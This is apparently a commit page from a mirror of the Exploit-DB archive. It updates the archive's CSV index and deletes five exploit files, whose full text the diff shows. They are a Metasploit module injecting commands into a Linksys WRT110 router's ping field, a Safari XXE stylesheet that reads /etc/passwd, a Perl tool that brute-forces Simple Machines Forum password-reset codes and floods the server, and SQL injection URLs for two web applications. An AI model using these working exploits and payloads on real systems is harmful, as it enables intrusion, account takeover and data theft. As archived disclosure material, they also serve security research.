bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-15

Browse source
This commit is contained in:
Offensive Security 2016-05-15 05:03:54 +00:00
parent 5e229672a0
commit 6c6fd8d397
6 changed files with 3 additions and 434 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -5457,7 +5457,7 @@ id,file,description,date,author,platform,type,port
5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x - (catid) SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0
5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection Exploit",2008-06-17,Mr.SQL,php,webapps,0
5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5836,platforms/php/webapps/5836.txt,"BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5836,platforms/php/webapps/5836.txt,"BaSiC-CMS - (index.php r) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - dne2000.sys kernel ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0
5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 (tid) Remote SQL Injection Vulnerability",2008-06-17,SuNHouSe2,php,webapps,0
@ -6804,7 +6804,6 @@ id,file,description,date,author,platform,type,port
7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Auth Bypass) SQL Injection Vulnerability",2008-11-27,Cyber-Zone,php,webapps,0
7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 beta 0001 - Remote File Inclusion Vulnerability",2008-11-27,NoGe,php,webapps,0
7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2008-11-27,The_5p3ctrum,php,webapps,0
7257,platforms/php/webapps/7257.txt,"BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability",2008-11-27,Mr.SQL,php,webapps,0
7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro Database Disclosure Vulnerability",2008-11-27,Stack,php,webapps,0
7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (DD/XSS) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0
7260,platforms/php/webapps/7260.txt,"BaSiC-CMS (acm2000.mdb) Remote Database Disclosure Vulnerability",2008-11-28,Stack,php,webapps,0
@ -7273,7 +7272,7 @@ id,file,description,date,author,platform,type,port
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion Exploit",2009-01-11,"Danny Moules",php,webapps,0
7733,platforms/php/webapps/7733.txt,"Photobase 1.2 (language) Local File Inclusion Vulnerability",2009-01-11,Osirys,php,webapps,0
7734,platforms/php/webapps/7734.txt,"Joomla Component Portfol (vcatid) SQL Injection Vulnerability",2009-01-12,H!tm@N,php,webapps,0
7735,platforms/php/webapps/7735.pl,"Simple Machines Forum - Destroyer 0.1",2009-01-12,Xianur0,php,webapps,0
7735,platforms/php/webapps/7735.pl,"Simple Machines Forum <= 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0
7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0
7738,platforms/php/webapps/7738.txt,"WordPress plugin WP-Forum 1.7.8 - Remote SQL Injection Vulnerability",2009-01-12,seomafia,php,webapps,0
@ -9455,7 +9454,6 @@ id,file,description,date,author,platform,type,port
10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation Vulnerability",2009-10-13,"Maxim A. Kulakov",windows,local,0
10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0
10086,platforms/multiple/remote/10086.txt,"WebKit 'Document()' Function Remote Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0
10087,platforms/multiple/remote/10087.txt,"WebKit XML External Entity Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0
10088,platforms/php/webapps/10088.txt,"WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability",2009-11-10,"Fernando Arnaboldi",php,webapps,0
10089,platforms/php/webapps/10089.txt,"WordPress <= 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0
10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 - 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0
@ -25894,7 +25892,6 @@ id,file,description,date,author,platform,type,port
28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX - Buffer Overflow",2013-10-10,blake,windows,remote,0
28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0
28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow PoC",2013-10-10,metacom,windows,dos,0
28856,platforms/hardware/remote/28856.rb,"Linksys WRT110 - Remote Command Execution",2013-10-10,metasploit,hardware,remote,0
28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 Pop_Mail.ASP SQL Injection Vulnerability",2006-10-24,"Arham Muhammad",asp,webapps,0
28858,platforms/php/webapps/28858.txt,"Simpnews 2.x admin/index.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0
28859,platforms/php/webapps/28859.txt,"Simpnews 2.x admin/pwlost.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0
@ -29492,7 +29489,6 @@ id,file,description,date,author,platform,type,port
32714,platforms/php/webapps/32714.txt,"Visuplay CMS - Multiple SQL Injection Vulnerabilities",2009-01-12,"Joseph Giron",php,webapps,0
32715,platforms/php/dos/32715.php,"PHP <= 5.2.8 - 'popen()' Function Buffer Overflow Vulnerability",2009-01-12,e.wiZz!,php,dos,0
32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0
32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0
@ -35483,14 +35479,13 @@ id,file,description,date,author,platform,type,port
39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery <= 1.9.1 'photocrati_ajax' Arbitrary File Upload Vulnerability",2014-05-19,SANTHO,php,webapps,0
39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0
39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0
39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin - 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read Vulnerability",2016-01-15,bingbing,java,webapps,4848
39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0
39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80
39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0
39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39248,platforms/php/webapps/39248.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin Cross Site Scripting and Command Injection Vulnerabilities",2014-07-13,MustLive,php,webapps,0
39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin 'includes/bookx_export.php' Local File Include Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0

Can't render this file because it is too large.

121
platforms/hardware/remote/28856.rb
View file

@ -1,121 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT110 Remote Command Execution',
'Description' => %q{
The Linksys WRT110 consumer router is vulnerable to a command injection
exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
test_login!
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login!
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end

40
platforms/multiple/remote/10087.txt
View file

@ -1,40 +0,0 @@
Safari prior to version 4 may permit an evil web page to steal files
from the local system.
This is accomplished by mounting an XXE attack against the parsing of
the XSL XML. This is best explained with a sample evil XSL file which
includes a DTD that attempts the XXE attack:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:
<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealfilebug.xsl"?>
<xml>
irrelevant
</xml>
Full technical details: http://scary.beasts.org/security/CESA-2009-006.html
Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)
Cheers
Chris

207
platforms/php/webapps/32717.pl
View file

@ -1,207 +0,0 @@
source: http://www.securityfocus.com/bid/33219/info
Simple Machines Forum is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-reset feature.
An attacker can exploit this issue to gain administrative access to the application, which may allow the attacker to compromise the application; other attacks are also possible.
Versions up to and including Simple Machines Forum 1.1.7 are vulnerable.
UPDATE (February 6, 2009): The vendor indicates that this issue was resolved in Simple Machines Forum 1.0.14 and 1.1.6.
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
use LWP::Simple;
use HTTP::Request;
#Author: Xianur0
#Uxmal666[at]gmail.com
# Cracks links Password Recovery
# Find Temporary Files executed by mods
# DB function Flood by Error Log
# File Path Disclosure
# List installed Mods (Useful To Find Mods Vulnerable)
# etc. ..
print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n";
my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL]
[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l
Installed Mods List \n-b Find Temporary\n-c Cracks links Password
Recovery (Recommended Use Proxy)");
version();
my $proxy = $ARGV[2] || "";
if($ARGV[0] ne "-c" && $proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
getopts('fplbc', \%opt);
crackeador() if $opt{c};
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}
sub version {
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12)
Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by
SMF (.*?)<\/a>/){
$version = $1;
print "\n[X] SMF Version: $version\n";
if($version < "1.1.7") {
print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X]
http://milw0rm.com/search.php?dong=smf".$version."\n\n";
}
}}}
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print "[X] Directory: $1\n";
} else { print "[!] Getting error Directory!\n";}
}
}
sub flood {
print "[X] Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET =>
$url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "[-] Sent: ".$i."\n";
} else {
print "[!] HTTP Error Query: " . $res->status_line . "\n";
}
}
}
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "[X] Temporary File Found: ".$url."/".$temp."\n";
} else {print "[!] Not Found: ".$url."/".$temp."\n";}
}
}
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "[X]Package:\nDescription: $mod[0]\nFile:
$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";
}
}
}
sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]\nExample: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128\n");
my $reminder = $url."?action=reminder";
my $smf = $reminder.";sa=setpassword;u=".$id.";code=";
my $proxy = $ARGV[3];
if($proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
print "\n[+] SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
if ($contenedor =~ /<input type="hidden" name="sc" value="(.*?)"/){
print "\n[+] sc Detected: $1\n";
$sc = $1;
} else { die "[!] SC could not be found!\n";}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('user='.$nick.'&sc='.$sc.'&=enviar');
$req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print "[x]Sent!\n";
}
sub generador() {
my $password = "";
my @chars = split(" ",
"0 1 2 3 4 5 6 7 8 9 a b c d e
f g h i j k l m n o p q r s t
u v w x y z");
for (my $i=0; $i < 10 ;$i++) {
$_rand = int(rand 35);
$password .= $chars[$_rand];
}
return $password;
}
sub brute() {
while($bucle ne "finito") {
$code = generador();
my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code;
my $content = HTTP::Request->new(GET => $reminder);
my $content = $ua->request($content)->as_string;
if ($content =~ /<input type="hidden" name="sc" value="(.*?)"/){
$sc = $1;
} else { die "[!] SC could not be found!\n";}
if ($content =~ /Set-Cookie: (.*?)
/){
print "\n[+] New SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
print "[+] Testing Code: ".$code."\n";
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc);
$req->header('Cookie' => $session);
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ '<input type="text" name="user" size="20" value="') {
print "[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n";
exit;
}
} else { die "[!] HTTP response incorrect!\n";}}}
print "\n[-] Sending Mail...\n\n";
mail();
print "\n[-] Attacking code link recovery...\n";
brute();
}

11
platforms/php/webapps/39248.txt
View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/68488/info
BSK PDF Manager plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BSK PDF Manager 1.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

47
platforms/php/webapps/7257.txt
View file

@ -1,47 +0,0 @@
#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## BaSiC-CMS ( index.php r )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM
##
## Email : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS !!
########################
########################
##
## Script : BaSiC-CMS
##
## site : www.Basic-CMS.de
##
########################
########################
##
## -(:: SQL ::)-
##
## www.site.com/pages/
## index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
##
## -(:: L!VE DEMO ::)-
##
## http://demo.basic-cms.de/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
##
#######################
#######################
#######################################################################################################
#######################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
#######################################################################################################
#######################################################################################################
# milw0rm.com [2008-11-27]